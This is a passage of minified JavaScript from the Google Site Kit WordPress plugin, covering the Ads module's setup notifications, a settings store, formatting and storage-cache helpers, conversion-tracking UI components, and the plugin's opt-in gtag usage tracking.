le===e}},"account-linked-via-google-for-woocommerce":{Component:AccountLinkedViaGoogleForWooCommerceSubtleNotification,areaSlug:We.bI.DASHBOARD_TOP,viewContexts:[Be.jU],checkRequirements:async({select:e,resolveSelect:t})=>{const[,i]=await Promise.all([t(k).getModuleData(),t(Te.i).isModuleConnected(fe.I)]),{isWooCommerceActivated:o,isGoogleForWooCommerceActivated:s,hasGoogleForWooCommerceAdsAccount:n}=e(k);return!i&&o()&&s()&&n()},featureFlag:"adsPax",isDismissible:!0},"ads-setup-cta":{Component:AdsModuleSetupCTABanner,priority:We.FQ.SETUP_CTA_HIGH,areaSlug:We.bI.DASHBOARD_TOP,groupID:We.He.SETUP_CTAS,viewContexts:[Be.jU],checkRequirements:async({select:e,resolveSelect:t})=>{await Promise.all([t(k).getModuleData(),t(Te.i).isModuleConnected(fe.I),t(Te.i).canActivateModule(fe.I)]);const{isModuleConnected:i}=e(Te.i),{hasGoogleForWooCommerceAdsAccount:o}=e(k);return!1===i(fe.I)&&!1===o()},isDismissible:!0,dismissRetries:1,featureFlag:"adsPax"},[G]:{Component:EnhancedConversionsNotification,priority:We.FQ.SETUP_CTA_HIGH,areaSlug:We.bI.DASHBOARD_TOP,groupID:We.He.SETUP_CTAS,viewContexts:[Be.jU],checkRequirements:async({resolveSelect:e})=>!!await e(Te.i).isModuleConnected(fe.I),isDismissible:!0,featureFlag:"gtagUserData"}};r().registerStore(k,ut),l().registerModule(fe.I,{storeName:k,SettingsEditComponent:SettingsEdit,SettingsViewComponent:SettingsView,SetupComponent:(0,Oe.G)("adsPax")?SetupMainPAX:SetupMain,Icon:h,features:[(0,p.__)("Tagging necessary for your ads campaigns to work will be disabled","google-site-kit"),(0,p.__)("Conversion tracking for your ads campaigns will be disabled","google-site-kit")],SettingsDisconnectNoteComponent:(0,Oe.G)("adsPax")?SettingsDisconnectNote:void 0,overrideSetupSuccessNotification:!0,checkRequirements:async e=>{if(!await e.resolveSelect(C.oR).isAdBlockerActive())return;const t=e.select(k).getAdBlockerWarningMessage();throw{code:C.od,message:t,data:null}}}),g(),function(e){for(const t in pt)e.registerNotification(t,pt[t])}(u())},45257:(e,t,i)=>{i.d(t,{A:()=>LoadingWrapper});var o=i(62688),s=i.n(o),n=i(4751),r=i(62540);function LoadingWrapper({loading:e,children:t,...i}){return e?(0,r.jsx)(n.A,{...i}):t}LoadingWrapper.propTypes={loading:s().bool,children:s().node,...n.A.propTypes}},46763:(e,t,i)=>{i.d(t,{B7:()=>v,FK:()=>j,JG:()=>M,VM:()=>S,Wq:()=>I,hk:()=>k,mV:()=>m});var o=i(32091),s=i.n(o),n=i(17243),r=i(54419),a=i(50539),l=i(8084),c=i(74426),g=i(35812),d=i(73866);const{clearError:u,receiveError:p}=d.o1,m="cannot submit changes while submitting changes",I="cannot submit changes if settings have not changed",y="SET_SETTINGS",h="ROLLBACK_SETTINGS",f="ROLLBACK_SETTING";function M(e,t,i,{ownedSettingsSlugs:o,storeName:d,settingSlugs:m=[],initialSettings:I,validateHaveSettingsChanged:M=S()}={}){s()(e,"type is required."),s()(t,"identifier is required."),s()(i,"datapoint is required.");const k=d||`${e}/${t}`,j={ownedSettingsSlugs:o,settings:I,savedSettings:void 0},v=(0,g.U)({baseName:"getSettings",controlCallback:()=>(0,r.get)(e,t,i,{},{useCache:!1}),reducerCallback:(0,a.createReducer)((e,t)=>{e.savedSettings={...t},e.settings={...t,...e.settings||{}}})}),b=(0,g.U)({baseName:"saveSettings",controlCallback:o=>{const{values:s}=o;return(0,r.set)(e,t,i,s)},reducerCallback:(0,a.createReducer)((e,t)=>{e.savedSettings={...t},e.settings={...t}}),argsToParams:e=>({values:e}),validateParams:({values:e}={})=>{s()((0,n.isPlainObject)(e),"values is required.")}}),N={},A={setSettings:e=>(s()((0,n.isPlainObject)(e),"values is required."),{payload:{values:e},type:y}),rollbackSettings:()=>({payload:{},type:h}),rollbackSetting:e=>(s()(e,"setting is required."),{payload:{setting:e},type:f}),*saveSettings(){const e=yield a.commonActions.getRegistry();yield u("saveSettings",[]);const t=e.select(k).getSettings(),{response:i,error:o}=yield b.actions.fetchSaveSettings(t);return o&&(yield p(o,"saveSettings",[])),{response:i,error:o}}},C=(0,a.createReducer)((e,{type:t,payload:i})=>{switch(t){case y:{const{values:t}=i;e.settings={...e.settings||{},...t};break}case h:e.settings=e.savedSettings;break;case f:{const{setting:t}=i;e.savedSettings[t]&&(e.settings={...e.settings||{},[t]:e.savedSettings[t]});break}default:void 0!==N[t]&&N[t](e,{type:t,payload:i})}}),x={*getSettings(){(yield a.commonActions.getRegistry()).select(k).getSettings()||(yield v.actions.fetchGetSettings())}},{safeSelector:D,dangerousSelector:T}=(0,l.RF)(M),w={haveSettingsChanged:D,__dangerousHaveSettingsChanged:T,getSettings:e=>e.settings,hasSettingChanged(e,t){s()(t,"setting is required.");const{settings:i,savedSettings:o}=e;return!(!i||!o)&&!(0,n.isEqual)(i[t],o[t])},isDoingSaveSettings:e=>Object.values(e.isFetchingSaveSettings).some(Boolean),getOwnedSettingsSlugs:e=>e.ownedSettingsSlugs,haveOwnedSettingsChanged:(0,a.createRegistrySelector)(e=>()=>{const t=e(k).getOwnedSettingsSlugs();return e(k).haveSettingsChanged(t)})};m.forEach(e=>{const t=(0,c.m2)(e),i=(0,c.sP)(e);A[`set${t}`]=e=>(s()(void 0!==e,`value is required for calls to set${t}().`),{payload:{value:e},type:`SET_${i}`}),N[`SET_${i}`]=(t,{payload:i})=>{const{value:o}=i;t.settings={...t.settings||{},[e]:o}},w[`get${t}`]=(0,a.createRegistrySelector)(t=>()=>(t(k).getSettings()||{})[e])});return{...(0,a.combineStores)(a.commonStore,v,b,{initialState:j,actions:A,controls:{},reducer:C,resolvers:x,selectors:w}),STORE_NAME:k}}function k(e,t){return async({select:i,dispatch:o})=>{if(i(t).haveSettingsChanged()){const{error:e}=await o(t).saveSettings();if(e)return{error:e}}return await(0,r.invalidateCache)("modules",e),{}}}function j(e){return({select:t,dispatch:i})=>t(e).haveSettingsChanged()?i(e).rollbackSettings():{}}function v(e){return t=>{const i=(0,l.WI)(t),{haveSettingsChanged:o,isDoingSubmitChanges:n}=i(e);s()(!n(),m),s()(o(),I)}}function S(){return(e,t,i)=>{const{settings:o,savedSettings:r}=t;i&&s()(!(0,n.isEqual)((0,n.pick)(o,i),(0,n.pick)(r,i)),I),s()(!(0,n.isEqual)(o,r),I)}}},46935:e=>{e.exports=googlesitekit.notifications},48276:(e,t,i)=>{i.d(t,{VZ:()=>n,dc:()=>r,pH:()=>s,r0:()=>a});var o=i(84024);function s(e){try{return new URL(e).pathname}catch{}return null}function n(e,t){try{return new URL(t,e).href}catch{}return("string"==typeof e?e:"")+("string"==typeof t?t:"")}function r(e){return"string"!=typeof e?e:e.replace(/^https?:\/\/(www\.)?/i,"").replace(/\/$/,"")}function a(e,t){if(!(0,o.m)(e))return e;if(e.length<=t)return e;const i=new URL(e),s=e.replace(i.origin,"");if(s.length<t)return s;const n=s.length-Math.floor(t)+1;return"…"+s.substr(n)}},49383:e=>{e.exports=googlesitekit.components},49746:(e,t,i)=>{i.d(t,{Eo:()=>d,JK:()=>I,K5:()=>m,jq:()=>p,mK:()=>g});var o=i(17243),s=i(50532),n=i.n(s),r=i(82871);function a(e,t={}){const{formatUnit:i,formatDecimal:o}=function(e,t={}){const{hours:i,minutes:o,seconds:s}=l(e);return{hours:i,minutes:o,seconds:s,formatUnit(){const{unitDisplay:n="short",...a}=t,l={unitDisplay:n,...a,style:"unit"};return 0===e?p(s,{...l,unit:"second"}):(0,r.sprintf)(/* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ /* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ (0,r._x)("%3$s %2$s %1$s","duration of time: hh mm ss","google-site-kit"),s?p(s,{...l,unit:"second"}):"",o?p(o,{...l,unit:"minute"}):"",i?p(i,{...l,unit:"hour"}):"").trim()},formatDecimal(){const t=(0,r.sprintf)( // translators: %s: number of seconds with "s" as the abbreviated unit. // translators: %s: number of seconds with "s" as the abbreviated unit. (0,r.__)("%ds","google-site-kit"),s);if(0===e)return t;const n=(0,r.sprintf)( // translators: %s: number of minutes with "m" as the abbreviated unit. // translators: %s: number of minutes with "m" as the abbreviated unit. (0,r.__)("%dm","google-site-kit"),o),a=(0,r.sprintf)( // translators: %s: number of hours with "h" as the abbreviated unit. // translators: %s: number of hours with "h" as the abbreviated unit. (0,r.__)("%dh","google-site-kit"),i);return(0,r.sprintf)(/* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ /* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ (0,r._x)("%3$s %2$s %1$s","duration of time: hh mm ss","google-site-kit"),s?t:"",o?n:"",i?a:"").trim()}}}(e,t);try{return i()}catch{return o()}}function l(e){e=parseInt(e,10),Number.isNaN(e)&&(e=0);return{hours:Math.floor(e/60/60),minutes:Math.floor(e/60%60),seconds:Math.floor(e%60)}}function c(e){return 1e6<=e?Math.round(e/1e5)/10:1e4<=e?Math.round(e/1e3):1e3<=e?Math.round(e/100)/10:e}function g(e){let t={};return"%"===e?t={style:"percent",maximumFractionDigits:2}:"s"===e?t={style:"duration",unitDisplay:"narrow"}:e&&"string"==typeof e?t={style:"currency",currency:e}:(0,o.isPlainObject)(e)&&(t={...e}),t}function d(e,t={}){e=(0,o.isFinite)(e)?e:Number(e),(0,o.isFinite)(e)||(console.warn("Invalid number",e,typeof e),e=0);const i=g(t),{style:s="metric"}=i;return"metric"===s?function(e){const t={minimumFractionDigits:1,maximumFractionDigits:1};return 1e6<=e?(0,r.sprintf)( // translators: %s: an abbreviated number in millions. // translators: %s: an abbreviated number in millions. (0,r.__)("%sM","google-site-kit"),p(c(e),e%10==0?{}:t)):1e4<=e?(0,r.sprintf)( // translators: %s: an abbreviated number in thousands. // translators: %s: an abbreviated number in thousands. (0,r.__)("%sK","google-site-kit"),p(c(e))):1e3<=e?(0,r.sprintf)( // translators: %s: an abbreviated number in thousands. // translators: %s: an abbreviated number in thousands. (0,r.__)("%sK","google-site-kit"),p(c(e),e%10==0?{}:t)):p(e,{signDisplay:"never",maximumFractionDigits:1})}(e):"duration"===s?a(e,i):"durationISO"===s?function(e){let{hours:t,minutes:i,seconds:o}=l(e);return o=("0"+o).slice(-2),i=("0"+i).slice(-2),t=("0"+t).slice(-2),"00"===t?`${i}:${o}`:`${t}:${i}:${o}`}(e):p(e,i)}const u=n()(console.warn);function p(e,t={}){const{locale:i=I(),...o}=t;try{return new Intl.NumberFormat(i,o).format(e)}catch(t){u(`Site Kit numberFormat error: Intl.NumberFormat( ${JSON.stringify(i)}, ${JSON.stringify(o)} ).format( ${typeof e} )`,t.message)}const s={currencyDisplay:"narrow",currencySign:"accounting",style:"unit"},n=["signDisplay","compactDisplay"],r={};for(const[e,t]of Object.entries(o))s[e]&&t===s[e]||n.includes(e)||(r[e]=t);try{return new Intl.NumberFormat(i,r).format(e)}catch{return new Intl.NumberFormat(i).format(e)}}function m(e,t={}){const{locale:i=I(),style:o="long",type:s="conjunction"}=t;if(Intl.ListFormat){return new Intl.ListFormat(i,{style:o,type:s}).format(e)} /* translators: used between list items, there is a space after the comma. */const n=(0,r.__)(", ","google-site-kit");return e.join(n)}function I(e=i.g){const t=(0,o.get)(e,["_googlesitekitLegacyData","locale"]);if(t){const e=t.match(/^(\w{2})?(_)?(\w{2})/);if(e&&e[0])return e[0].replace(/_/g,"-")}return e.navigator.language}},49993:(e,t,i)=>{i.d(t,{Gq:()=>d,IL:()=>I,LD:()=>p,SO:()=>u,a2:()=>s,xD:()=>m});var o=i(6109);const s="googlesitekit_",n=`${s}1.170.0_${i.g._googlesitekitBaseData.storagePrefix}_`,r=["sessionStorage","localStorage"];let a,l=[...r];async function c(e){const t=i.g[e];if(!t)return!1;try{const e="__storage_test__";return t.setItem(e,e),t.removeItem(e),!0}catch(e){return e instanceof DOMException&&(22===e.code||1014===e.code||"QuotaExceededError"===e.name||"NS_ERROR_DOM_QUOTA_REACHED"===e.name)&&0!==t.length}}async function g(){if(void 0!==a)return a;for(const e of l)a||await c(e)&&(a=i.g[e]);return void 0===a&&(a=null),a}async function d(e){const t=await g();if(t){const i=t.getItem(`${n}${e}`);if(i){const e=JSON.parse(i),{timestamp:t,ttl:o,value:s,isError:n}=e;if(t&&(!o||Math.round(Date.now()/1e3)-t<o))return{cacheHit:!0,value:s,isError:n}}}return{cacheHit:!1,value:void 0}}async function u(e,t,{ttl:s=o.Jg,timestamp:r=Math.round(Date.now()/1e3),isError:a=!1}={}){const l=await g();if(l)try{return l.setItem(`${n}${e}`,JSON.stringify({timestamp:r,ttl:s,value:t,isError:a})),!0}catch(e){return i.g.console.warn("Encountered an unexpected storage error:",e),!1}return!1}async function p(e){const t=await g();if(t)try{const i=e.startsWith(s)?e:`${n}${e}`;return t.removeItem(i),!0}catch(e){return i.g.console.warn("Encountered an unexpected storage error:",e),!1}return!1}async function m(){const e=await g();if(e)try{const t=[];for(let i=0;i<e.length;i++){const o=e.key(i);0===o.indexOf(s)&&t.push(o)}return t}catch(e){return i.g.console.warn("Encountered an unexpected storage error:",e),[]}return[]}async function I(){if(await g()){const e=await m();for(const t of e)await p(t);return!0}return!1}},50304:(e,t,i)=>{i.d(t,{A:()=>IconWrapper});var o=i(62688),s=i.n(o),n=i(62540);function IconWrapper({children:e,marginLeft:t,marginRight:i}){return(0,n.jsx)("span",{className:"googlesitekit-icon-wrapper",style:{marginLeft:t,marginRight:i},children:e})}IconWrapper.propTypes={children:s().node.isRequired,marginLeft:s().number,marginRight:s().number}},50464:(e,t,i)=>{i.d(t,{A:()=>r,G:()=>n});var o=i(62688),s=i.n(o);const n=" ";function DisplaySetting({value:e}){return e||n}DisplaySetting.propTypes={value:s().oneOfType([s().string,s().bool,s().number])};const r=DisplaySetting},50477:(e,t,i)=>{i.d(t,{C:()=>n,p:()=>s});var o=i(55465);function s(e,t={}){return{__html:o.O.sanitize(e,t)}}function n(e){const t="object"==typeof e?e.toString():e;return t?.replace?.(/\/+$/,"")}},50539:e=>{e.exports=googlesitekit.data},52274:(e,t,i)=>{i.d(t,{i:()=>r});var o=i(63696),s=i(50539),n=i(7972);function r(e){const{setValue:t}=(0,s.useDispatch)(n.n);return(0,o.useCallback)(()=>{t("admin-screen-tooltip",{isTooltipVisible:!0,...e})},[t,e])}},52735:(e,t,i)=>{i.d(t,{A:()=>o});const o=(0,i(63696).createContext)(!1)},54419:e=>{e.exports=googlesitekit.api},55103:(e,t,i)=>{i.d(t,{A:()=>SupportLink});var o=i(62688),s=i.n(o),n=i(50539),r=i(29785),a=i(38432),l=i(62540);function SupportLink(e){const{path:t,query:i,hash:o,...s}=e,c=(0,n.useSelect)(e=>e(r.O4).getGoogleSupportURL({path:t,query:i,hash:o}));return(0,l.jsx)(a.A,{...s,href:c})}SupportLink.propTypes={path:s().string.isRequired,query:s().object,hash:s().string}},55465:(e,t,i)=>{i.d(t,{O:()=>s});var o=i(31234);const s=i.n(o)()(i.g)},55989:(e,t,i)=>{i.d(t,{A:()=>l});var o=i(62688),s=i.n(o),n=i(4452),r=i.n(n),a=i(62540);function VisuallyHidden({className:e,children:t,...i}){return t?(0,a.jsx)("span",{...i,className:r()("screen-reader-text",e),children:t}):null}VisuallyHidden.propTypes={className:s().string,children:s().node},VisuallyHidden.defaultProps={className:""};const l=VisuallyHidden},59865:(e,t,i)=>{i.d(t,{A:()=>p});var o=i(62688),s=i.n(o),n=i(4452),r=i.n(n),a=i(52684),l=i(13606),c=i(82871),g=i(49383),d=i(85149),u=i(62540);function ModalDialog({className:e="",dialogActive:t=!1,handleCancel:i=null,onOpen:o=null,onClose:s=null,title:n=null,provides:p,handleConfirm:m,subtitle:I,confirmButton:y=null,notes:h=[],danger:f=!1,inProgress:M=!1,small:k=!1,medium:j=!1,buttonLink:v=null}){const S=`googlesitekit-dialog-description-${(0,a.A)(ModalDialog)}`,b=!(!p||!p.length);return(0,u.jsxs)(g.Dialog,{open:t,onOpen:o,onClose:s,"aria-describedby":b?S:void 0,tabIndex:"-1",className:r()(e,{"googlesitekit-dialog-sm":k,"googlesitekit-dialog-md":j}),children:[(0,u.jsxs)(g.DialogTitle,{children:[f&&(0,u.jsx)(d.A,{width:28,height:28}),n]}),I?(0,u.jsx)("p",{className:"mdc-dialog__lead",children:I}):[],(0,u.jsxs)(g.DialogContent,{children:[b&&(0,u.jsx)("section",{id:S,className:"mdc-dialog__provides",children:(0,u.jsx)("ul",{className:"mdc-list mdc-list--underlined mdc-list--non-interactive",children:p.map(e=>(0,u.jsx)("li",{className:"mdc-list-item",children:(0,u.jsx)("span",{className:"mdc-list-item__text",children:e})},e))})}),h.length>0&&(0,u.jsx)("section",{className:"mdc-dialog__notes",children:h.map((e,t)=>(0,u.jsxs)("p",{className:"mdc-dialog__note",children:["string"==typeof e&&(0,l.A)((0,c.sprintf)(/* translators: %s is replaced with some sub-note text. */ /* translators: %s is replaced with some sub-note text. */ (0,c.__)("<strong>Note:</strong> %s","google-site-kit"),e),{strong:(0,u.jsx)("strong",{})}),"function"==typeof e&&(0,u.jsx)(e,{})]},`note-${t}`))})]}),(0,u.jsxs)(g.DialogFooter,{children:[(0,u.jsx)(g.Button,{className:"mdc-dialog__cancel-button",onClick:i,disabled:M,tertiary:!0,children:(0,c.__)("Cancel","google-site-kit")}),v?(0,u.jsx)(g.Button,{href:v,onClick:m,target:"_blank",danger:f,children:y}):(0,u.jsx)(g.SpinnerButton,{onClick:m,danger:f,disabled:M,isSaving:M,children:y||(0,c.__)("Disconnect","google-site-kit")})]})]})}ModalDialog.displayName="Dialog",ModalDialog.propTypes={className:s().string,dialogActive:s().bool,handleDialog:s().func,handleConfirm:s().func.isRequired,onOpen:s().func,onClose:s().func,title:s().string,provides:s().arrayOf(s().string),confirmButton:s().string,notes:s().arrayOf(s().oneOfType([s().string,s().elementType])),danger:s().bool,small:s().bool,medium:s().bool,buttonLink:s().string};const p=ModalDialog},60854:(e,t,i)=>{i.d(t,{A:()=>ConversionTrackingToggle});var o=i(63696),s=i(82871),n=i(49383),r=i(50539),a=i(29785),l=i(45257),c=i(62688),g=i.n(c),d=i(15844),u=i(82246),p=i(6109),m=i(62659),I=i(62540);function ConfirmDisableConversionTrackingDialog({onConfirm:e,onCancel:t}){const i=(0,m.A)(),o=(0,s.__)("By disabling plugin conversion tracking, you will no longer have access to:","google-site-kit"),n=[(0,s.__)("Performance of your Ad campaigns","google-site-kit"),(0,s.__)("Tracking additional conversion-related events via Analytics","google-site-kit")];return(0,d.A)(()=>{(0,p.sx)(`${i}`,"ect_view_modal")}),(0,I.jsx)(u.A,{className:"googlesitekit-settings-module__confirm-disconnect-modal",title:(0,s.__)("Disable plugin conversion tracking","google-site-kit"),subtitle:o,handleConfirm:e,handleCancel:t,onClose:t,provides:n,confirmButton:(0,s.__)("Disable","google-site-kit"),dialogActive:!0,danger:!0})}ConfirmDisableConversionTrackingDialog.propTypes={onConfirm:g().func.isRequired,onCancel:g().func.isRequired};var y=i(73198);function ConversionTrackingToggle({children:e,loading:t}){const i=(0,m.A)(),[c]=(0,o.useState)(null),[g,d]=(0,o.useState)(!1),u=(0,r.useSelect)(e=>e(a.O4).isConversionTrackingEnabled()),h=(0,r.useSelect)(e=>e(a.O4).isFetchingSaveConversionTrackingSettings()),{setConversionTrackingEnabled:f}=(0,r.useDispatch)(a.O4);return(0,I.jsxs)("div",{children:[(0,I.jsx)(l.A,{loading:t,width:"180px",height:"21.3px",children:(0,I.jsx)("div",{className:"googlesitekit-module-settings-group__switch",children:(0,I.jsx)(n.Switch,{label:(0,s.__)("Plugin conversion tracking","google-site-kit"),checked:u,disabled:h||t,onClick:()=>{u?((0,p.sx)(`${i}`,"ect_disable"),d(!0)):((0,p.sx)(`${i}`,"ect_enable"),f(!0))},hideLabel:!1})})}),!!c&&(0,I.jsx)(y.A,{message:c.message}),(0,I.jsx)(l.A,{className:"googlesitekit-settings-conversion-tracking-switch-description--loading",loading:t,width:"750px",height:"42px",smallWidth:"386px",smallHeight:"84px",tabletWidth:"540px",tabletHeight:"84px",children:(0,I.jsx)("p",{className:"googlesitekit-module-settings-group__helper-text",children:e})}),g&&(0,I.jsx)(ConfirmDisableConversionTrackingDialog,{onConfirm:()=>{(0,p.sx)(`${i}`,"ect_confirm_disable"),f(!1),d(!1)},onCancel:()=>{(0,p.sx)(`${i}`,"ect_cancel_disable"),d(!1)}})]})}ConversionTrackingToggle.propTypes={children:g().node.isRequired,loading:g().bool}},61736:(e,t,i)=>{i.d(t,{A:()=>SettingsGroup});var o=i(62688),s=i.n(o),n=i(33052),r=i(62540);function SettingsGroup({title:e,children:t}){return(0,r.jsxs)("div",{className:"googlesitekit-module-settings-group",children:[(0,r.jsx)(n.A,{as:"h4",size:"medium",type:"title",children:e}),t]})}SettingsGroup.propTypes={title:s().string.isRequired,children:s().node.isRequired}},61983:(e,t,i)=>{i.d(t,{A:()=>DismissButton});var o=i(62688),s=i.n(o),n=i(82871),r=i(49383),a=i(62540);function DismissButton({className:e,label:t=(0,n.__)("Maybe later","google-site-kit"),onClick:i,disabled:o,tertiary:s=!0}){return i?(0,a.jsx)(r.Button,{className:e,onClick:i,disabled:o,tertiary:s,children:t}):null}DismissButton.propTypes={className:s().string,label:s().string,onClick:s().func,disabled:s().bool,tertiary:s().bool,dismissOptions:s().shape({expiresInSeconds:s().number,skipHidingFromQueue:s().bool})}},62051:(e,t,i)=>{i.d(t,{A:()=>LearnMoreLink});var o=i(62688),s=i.n(o),n=i(38432),r=i(68761),a=i(62540);function LearnMoreLink({id:e,label:t,url:i,ariaLabel:o,gaTrackingEventArgs:s,external:l=!0,...c}){const g=(0,r.A)(e);return(0,a.jsx)(n.A,{onClick:function(e){e.persist(),g.clickLearnMore(s?.label,s?.value)},href:i,"aria-label":o,external:l,...c,children:t})}LearnMoreLink.propTypes={id:s().string,label:s().string,url:s().string,ariaLabel:s().string,gaTrackingEventArgs:s().shape({label:s().string,value:s().string}),external:s().bool}},62659:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o=i(63696),s=i(19826);const __WEBPACK_DEFAULT_EXPORT__=function(){return(0,o.useContext)(s.Ay)}},65054:(e,t,i)=>{i.d(t,{M9:()=>b,sx:()=>v,BI:()=>S});var o=i(17243);const s="_googlesitekitDataLayer",n="data-googlesitekit-gtag";function r(e){return function(){e[s]=e[s]||[],e[s].push(arguments)}}var a=i(84895);const l={activeModules:[],isAuthenticated:!1,referenceSiteURL:"",trackingEnabled:!1,trackingID:"",userIDHash:"",userRoles:[]};const{activeModules:c=[],isSiteKitScreen:g,trackingEnabled:d,trackingID:u,referenceSiteURL:p,userIDHash:m,isAuthenticated:I,userRoles:y}=i.g._googlesitekitTrackingData||{},h={activeModules:c,trackingEnabled:d,trackingID:u,referenceSiteURL:p,userIDHash:m,isSiteKitScreen:g,userRoles:y,isAuthenticated:I,pluginVersion:"1.170.0"},{enableTracking:f,disableTracking:M,isTrackingEnabled:k,initializeSnippet:j,trackEvent:v,trackEventOnce:S}=function(e,t=i.g,c=i.g){const g={...l,...e};g.referenceSiteURL&&(g.referenceSiteURL=g.referenceSiteURL.toString().replace(/\/+$/,""));const d=function(e,t){const o=r(t);let l;const{activeModules:c,referenceSiteURL:g,userIDHash:d,userRoles:u=[],isAuthenticated:p,pluginVersion:m}=e;return function(){const{document:t}=i.g;if(void 0===l&&(l=!!t.querySelector(`script[${n}]`)),l)return!1;l=!0;const r=u?.length?u.join(","):"";o("js",new Date),o("config",e.trackingID,{groups:"site_kit",send_page_view:e.isSiteKitScreen,domain:g,plugin_version:m||"",enabled_features:Array.from(a.t).join(","),active_modules:c.join(","),authenticated:p?"1":"0",user_properties:{user_roles:r,user_identifier:d}});const I=t.createElement("script");return I.setAttribute(n,""),I.async=!0,I.src=`https://www.googletagmanager.com/gtag/js?id=${e.trackingID}&l=${s}`,t.head.appendChild(I),{scriptTagSrc:`https://www.googletagmanager.com/gtag/js?id=${e.trackingID}&l=${s}`}}}(g,t),u=function(e,t,i,o){const s=r(t);return async function(t,n,r,a){const{trackingEnabled:l}=e;if(!l)return null;i();const c={send_to:"site_kit",event_category:t,event_label:r,value:a};return new Promise(e=>{const i=setTimeout(function(){o.console.warn(`Tracking event "${n}" (category "${t}") took too long to fire.`),e()},1e3);function r(){clearTimeout(i),e()}s("event",n,{...c,event_callback:r}),o._gaUserPrefs?.ioo?.()&&r()})}}(g,t,d,c),p={};return{enableTracking:function(){g.trackingEnabled=!0},disableTracking:function(){g.trackingEnabled=!1},initializeSnippet:d,isTrackingEnabled:function(){return!!g.trackingEnabled},trackEvent:u,trackEventOnce:function(...e){const t=JSON.stringify(e);p[t]||(p[t]=(0,o.once)(u)),p[t](...e)}}}(h);function b(e){e?f():M()}g&&d&&j()},65929:(e,t,i)=>{i.d(t,{A:()=>u});var o=i(63696),s=i(50539),n=i(29785),r=i(97345),a=i(88273),l=i(70301),c=i(49993),g=i(65054),d=i(62659);function u(e){const t=(0,d.A)(),i=(0,s.useSelect)(t=>t(a.i).getModule(e)),u=(0,s.useSelect)(e=>e(r.oR).hasCapability(r.HD)),{activateModule:p}=(0,s.useDispatch)(a.i),{navigateTo:m}=(0,s.useDispatch)(l.M),{setInternalServerError:I}=(0,s.useDispatch)(n.O4),y=(0,o.useCallback)(async()=>{const{error:i,response:o}=await p(e);i?I({id:`${e}-setup-error`,description:i.message}):(await(0,g.sx)(`${t}_widget-activation-cta`,"activate_module",e),await(0,c.SO)("module_setup",e,{ttl:300}),m(o.moduleReauthURL))},[p,e,m,I,t]);return i?.name&&u?y:null}},65976:(e,t,i)=>{i.d(t,{ne:()=>k,Ay:()=>b});var o=i(32091),s=i.n(o),n=i(61971),r=i(51568),a=i(82286),l=i(50539),c=i(29785),g=i(6109);function d(e){if(void 0!==e)return!e}function u(e){return(0,l.createRegistrySelector)(t=>()=>(t(c.O4).getSiteInfo()||{})[e])}const p="RECEIVE_SITE_INFO",m="RECEIVE_PERMALINK_PARAM",I="SET_SITE_KIT_AUTO_UPDATES_ENABLED",y="SET_KEY_METRICS_SETUP_COMPLETED_BY",h="SET_SETUP_ERROR_CODE",f={siteInfo:void 0,permaLink:!1},M={receiveSiteInfo:e=>(s()(e,"siteInfo is required."),{payload:{siteInfo:e},type:p}),receivePermaLinkParam:e=>(s()(e,"permaLink is required."),{payload:{permaLink:e},type:m}),setSiteKitAutoUpdatesEnabled:e=>(s()("boolean"==typeof e,"siteKitAutoUpdatesEnabled must be a boolean."),{payload:{siteKitAutoUpdatesEnabled:e},type:I}),setKeyMetricsSetupCompletedBy:e=>(s()("number"==typeof e,"keyMetricsSetupCompletedBy must be a number."),{payload:{keyMetricsSetupCompletedBy:e},type:y}),setSetupErrorCode:e=>(s()("string"==typeof e||null===e,"setupErrorCode must be a string or null."),{payload:{setupErrorCode:e},type:h})},k={},j=(0,l.createReducer)((e,{payload:t,type:i})=>{switch(i){case p:const{adminURL:i,ampMode:o,currentEntityID:s,currentEntityTitle:n,currentEntityType:r,currentEntityURL:a,homeURL:l,proxyPermissionsURL:c,proxySetupURL:g,referenceSiteURL:d,setupErrorCode:u,setupErrorMessage:f,setupErrorRedoURL:M,siteName:k,siteLocale:j,timezone:v,startOfWeek:S,usingProxy:b,webStoriesActive:N,proxySupportLinkURL:A,widgetsAdminURL:C,postTypes:x,wpVersion:D,updateCoreURL:T,changePluginAutoUpdatesCapacity:w,siteKitAutoUpdatesEnabled:_,pluginBasename:E,productPostType:R,keyMetricsSetupCompletedBy:L,keyMetricsSetupNew:P,consentModeRegions:O,anyoneCanRegister:G,isMultisite:z}=t.siteInfo;e.siteInfo={adminURL:i,ampMode:o,currentEntityID:parseInt(s,10),currentEntityTitle:n,currentEntityType:r,currentEntityURL:a,homeURL:l,proxyPermissionsURL:c,proxySetupURL:g,referenceSiteURL:d,setupErrorCode:u,setupErrorMessage:f,setupErrorRedoURL:M,siteName:k,siteLocale:j,timezone:v,startOfWeek:S,usingProxy:b,webStoriesActive:N,proxySupportLinkURL:A,widgetsAdminURL:C,postTypes:x,wpVersion:D,updateCoreURL:T,changePluginAutoUpdatesCapacity:w,siteKitAutoUpdatesEnabled:_,pluginBasename:E,productPostType:R,keyMetricsSetupCompletedBy:L,keyMetricsSetupNew:P,consentModeRegions:O,anyoneCanRegister:G,isMultisite:z};break;case m:e.permaLink=t.permaLink;break;case I:e.siteInfo||(e.siteInfo={}),e.siteInfo.siteKitAutoUpdatesEnabled=t.siteKitAutoUpdatesEnabled;break;case y:e.siteInfo||(e.siteInfo={}),e.siteInfo.keyMetricsSetupCompletedBy=t.keyMetricsSetupCompletedBy;break;case h:e.siteInfo||(e.siteInfo={}),e.siteInfo.setupErrorCode=t.setupErrorCode}}),v={*getSiteInfo(){if((yield l.commonActions.getRegistry()).select(c.O4).getSiteInfo())return;if(!i.g._googlesitekitBaseData||!i.g._googlesitekitEntityData)return void i.g.console.error("Could not load core/site 